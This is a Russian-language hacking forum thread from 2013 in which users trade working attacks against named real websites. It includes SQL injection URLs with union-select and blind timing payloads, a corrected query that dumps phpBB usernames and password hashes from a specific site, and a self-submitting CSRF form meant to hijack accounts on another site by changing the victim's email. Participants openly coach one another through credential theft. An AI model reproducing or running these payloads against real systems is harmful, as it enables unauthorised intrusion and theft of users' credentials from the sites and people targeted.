Ваши вопросы по уязвимостям.

nikitos2020 · 18 Aug 2013

вот сама форма :

PHP:

<form method="post" action="/profile" class="reg_form"> <table> <tbody><tr> <td> <label><p><font color="black">Имя <input name="name" type="text" value="nikitos2020"> </font></p></label></td><td></td><td> <label><p><font color="black">PM кошелек <input name="pm_account" type="text" value="U3278335"> </font></p></label></td> </tr><tr> <td> <label><p><font color="black">Фамилия <input name="lastname" type="text" value="dfcer"> </font></p></label></td> <td></td> <td> <label><p><font color="black">Skype <input name="skype" type="text" value=""> </font></p></label></td> </tr> <tr> <td> <label><p><font color="black">E-mail <input name="email" type="text" value="[email protected]" readonly="1" class="readonly"> </font></p></label></td> <td>                                  </td> <td> <label><p><font color="black">ICQ <input name="icq" type="text" value=""> </font></p></label></td> </tr> </tbody></table>    <table> <tbody><tr> <td> <label><p><font color="black">Старый пароль <input name="pass_old" type="text"></font></p></label></td><td> </td><td> <label><p><font color="black">Новый пароль <input name="pass" type="text"> </font></p></label></td><td>   </td><td> <label><p><font color="black">Повторите новый пароль <input name="pass2" type="text"> </font></p></label></td> </tr><tr><td></td> <td><input type="submit" name="done" value="Сохранить" class="button"></td> </tr> </tbody></table> </form>

randman · 18 Aug 2013

Можно тестовый аккаунт, обязательно посмотрю? Судя по этой форме, что вы скинули, при отсутствии защиты, статически будет это так:

PHP:

<form method="post" action="http://euroits.com/profile" id="test" accept-charset="UTF-8"> <input name="name" value="Ваш текст"/> <input name="pm_account" value="Ваш текст"/> <input name="lastname" value="Ваш текст"/> <input name="skype" value="Ваш текст"/> <input name="email" value="Ваш текст"/> <input name="icq" value="Ваш текст"/> <input name="pass_old" value="Ваш текст"/> <input name="pass" value="Ваш текст"/> <input name="pass2" value="Ваш текст"/> <input name="done" value="Сохранить"/> </form> <script> document.getElementById('test').submit(); </script>

Предполагаю, что возможно сменить пароль не задавая старый нереально.

nikitos2020 · 18 Aug 2013

XAMEHA said:

Можно тестовый аккаунт, обязательно посмотрю? Судя по этой форме, что вы скинули, при отсутствии защиты, статически будет это так:

PHP:

<form method="post" action="http://euroits.com/profile" id="test" accept-charset="UTF-8"> <input name="name" value="Ваш текст"/> <input name="pm_account" value="Ваш текст"/> <input name="lastname" value="Ваш текст"/> <input name="skype" value="Ваш текст"/> <input name="email" value="Ваш текст"/> <input name="icq" value="Ваш текст"/> <input name="pass_old" value="Ваш текст"/> <input name="pass" value="Ваш текст"/> <input name="pass2" value="Ваш текст"/> <input name="done" value="Сохранить"/> </form> <script> document.getElementById('test').submit(); </script>

Предполагаю, что возможно сменить пароль не задавая старый нереально.
Click to expand...

)) так в этом и фишка бро) нужно всеголишь изменить mail, и начинаются танцы))) как только у жертвы поменяется почта, ты заходишь на сайт жмём "востоновить" после вводим мэил который поменялся у жертвы... к нам на почту приходит его ник и пароль (который стоит в настоящие время)) то есть пароль не сбрасывается а отправляется существующий в настоящий момент)) ах да вот аккаунт зарегал попробуй: логин: XAMEHA пароль: qwe123

randman · 19 Aug 2013

nikitos2020 said:

нужно всеголишь изменить mail, и начинаются танцы))
Click to expand...

Но ведь этот ресурс не позволяет менять мыло даже у себя, оно не сохраняется в профиле

Кошелек, контакт, данные - да, а вот mail - нет. Возможно вам стоит выполнять какие-то другие действия?

Unknowhacker · 19 Aug 2013

В общем есть сукля, но раскрутить её не получается
Code:
http://shimanomarket.com.ua/products.php?category=53&page=0&special=show&order=-dprice%29%27+union+select+1,2,3+--+
и вторая
Code:
http://www.aerosol.com.ua/products.php?id=3%27
но если дописать union+select выбьет = Not Acceptable

Always · 19 Aug 2013

http://linzapro.ru/feedback/
пост
fsearch=777[SQL]&subsearch=1
не буду врать - нашел через софт, но руками никак...!

er9j6@ · 20 Aug 2013

Always said:

http://linzapro.ru/feedback/
пост
fsearch=777[SQL]&subsearch=1
не буду врать - нашел через софт, но руками никак...!
Click to expand...

Что за софт?

Блиндом крутится

http://linzapro.ru/bigpic_log.php?pid=109452%20and%20if%28Length%28%28select%20distinct%20table_name%20from%20%60information_schema%60.tables%20where%20table_schema%3D0x6C696E7A6170726F%20limit%201%2C1%29%29%3D21%2CBENCHMARK%28267134%2CMD5%280x41%29%29%2C0%29

YaBtr · 20 Aug 2013

Или так: post-запрос

Spot · 20 Aug 2013

Отсечь часть UPDATE запроса

Добрый день,

на одном сайте столкнулся с заполнением анкеты, и в одном поле, случайно задал вместе с числом знак %, после чего при сохранения профиля мне выдало следующее:
Code:
You have an error in your SQL syntax; check the manual that corresponds
 to your MySQL server version for the right syntax to use
 near ';, abgl= 2, a_t = 2 WHERE id = 87637 AND user_id = 114239' at line 1 ---->

 UPDATE you_profil SET t_raum_v= '09/2009 - 09/2012', zeitraum_von = '2009-9-00',
 t_raum_b= '2012-9-00', beruf = '2', a_ort= 'Harward', e_znote= 'Bachelor',
 notiz= 'Some text', note = 1.9%;, abgl= 2, a_t= 2 WHERE id = 87637 AND user_id = 114239
Пробывал экранировать остаток запроса после поля note = 1,9%-- и note = 1,9/** , но не выходит. Подскажите как можно закомментировать остаток запроса, что бы он не исполнялся. Вместо него хочу добавить свой запрос.

Always · 20 Aug 2013

er9j6@ said:

Что за софт?

Блиндом крутится

http://linzapro.ru/bigpic_log.php?pid=109452%20and%20if%28Length%28%28select%20distinct%20table_name%20from%20%60information_schema%60.tables%20where%20table_schema%3D0x6C696E7A6170726F%20limit%201%2C1%29%29%3D21%2CBENCHMARK%28267134%2CMD5%280x41%29%29%2C0%29
Click to expand...

YaBtr said:

Или так: post-запрос

Click to expand...

никак...!

ishenko · 20 Aug 2013

Приветствую всех.
При запросе site.ru:3306 скачивается файл а в нем версия мускуля
F 5.0.32-Debian_7etch5 нz J>8>m**0 ,ў! U:a\)VU*mg@F яBad handshake
настройки мускула неправильные?
дальше что нить можно с этим сделать?

есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?

Inoms · 20 Aug 2013

ishenko said:

есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?
Click to expand...

Привязка пользователя к конкретному хосту вполне может быть, или там у каждого пользователя хост равен localhost. Если там нет phpmyadmin'a, или ему подобному, подключиться удаленно не получится.

Unknowhacker · 21 Aug 2013

Я уже задолбался подбирать столбцы

Code:

http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27

народ, скажите что не так

Ravenous · 21 Aug 2013

Unknowhacker said:
Я уже задолбался подбирать столбцы
Code:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27
народ, скажите что не так
Click to expand...
SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1

Unknowhacker · 22 Aug 2013

Ravenous said:

SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1
Click to expand...

Разочарование при вводе version() - I don't like you...

trololoman96 · 22 Aug 2013

хакир ну и чо ? то что фильт на version() это еще ничего не значит, самое главное то нормально выводится. и саму версию бд можно вывести так @@version

danil7493 · 23 Aug 2013

Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9+from+phpbb_users

Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы

5.0.92-log:trunovc7_tr@localhost:trunovc7_loy

migjee · 23 Aug 2013

Нашел единственную уязвимость на сайте.Начал анализ
Нашел мне такую базу данных, в хавидж жму Get tables внутри ничего не вылезает, вот название Current DB: }NLrxf}x{f}ffw иероглифы какие то и скобки.Скажите что делать?

RedX · 23 Aug 2013

danil7493 said:

Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9+from+phpbb_users

Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы

5.0.92-log:trunovc7_tr@localhost:trunovc7_loy
Click to expand...
HTML:
http://www.trunov.com/news.php?newsid=-237+UNION+SELECT+1,CONCAT_ws(0x3a,username,user_password),3,4,5,6,7,8,9+FROM+trunovc7_forum.phpbb_users+LIMIT+1,1--&page=1

YaBtr · 23 Aug 2013

danil7493 said:

Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9+from+phpbb_users

Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы

5.0.92-log:trunovc7_tr@localhost:trunovc7_loy
Click to expand...

Зачем скрывать доменное имя, если в большинстве случаев оно схоже с именем юзера или базы?! В Вашем случае, я так понимаю, http://www.trunov.com

Далее несложно определить, что курутиться несколько баз данных:
помимо information_schema и trunovc7_loy есть еще trunovc7_forum, которая и содержит необходимую Вам таблицу, то есть запрос примет вид ...from trunovc7_forum.phpbb_users.

И еще момент: колонки с названием password нет в таблице phpbb_users, есть user_password.

Итог:

http://www._____.com/news.php?newsid=-397+union+select+1,2,group_concat(0x3a,username,user_password),4,5,6,7,8,9+from+trunovc7_forum.phpbb_users --+
Click to expand...

Ваши вопросы по уязвимостям.

nikitos2020 New Member

randman Members of Antichat

nikitos2020 New Member

randman Members of Antichat

Unknowhacker Member

Always New Member

er9j6@ Elder - Старейшина

YaBtr Members of Antichat

Spot Elder - Старейшина

Always New Member

ishenko New Member

Inoms Member

Unknowhacker Member

Ravenous Elder - Старейшина

Unknowhacker Member

trololoman96 Elder - Старейшина

danil7493 Member

migjee New Member

RedX Member

YaBtr Members of Antichat

Useful Searches

Ваши вопросы по уязвимостям.

nikitos2020 New Member

randman Members of Antichat

nikitos2020 New Member

randman Members of Antichat

Unknowhacker Member

Always New Member

er9j6@ Elder - Старейшина

YaBtr Members of Antichat

Spot Elder - Старейшина

Always New Member

ishenko New Member

Inoms Member

Unknowhacker Member

Ravenous Elder - Старейшина

Unknowhacker Member

trololoman96 Elder - Старейшина

danil7493 Member

migjee New Member

RedX Member

YaBtr Members of Antichat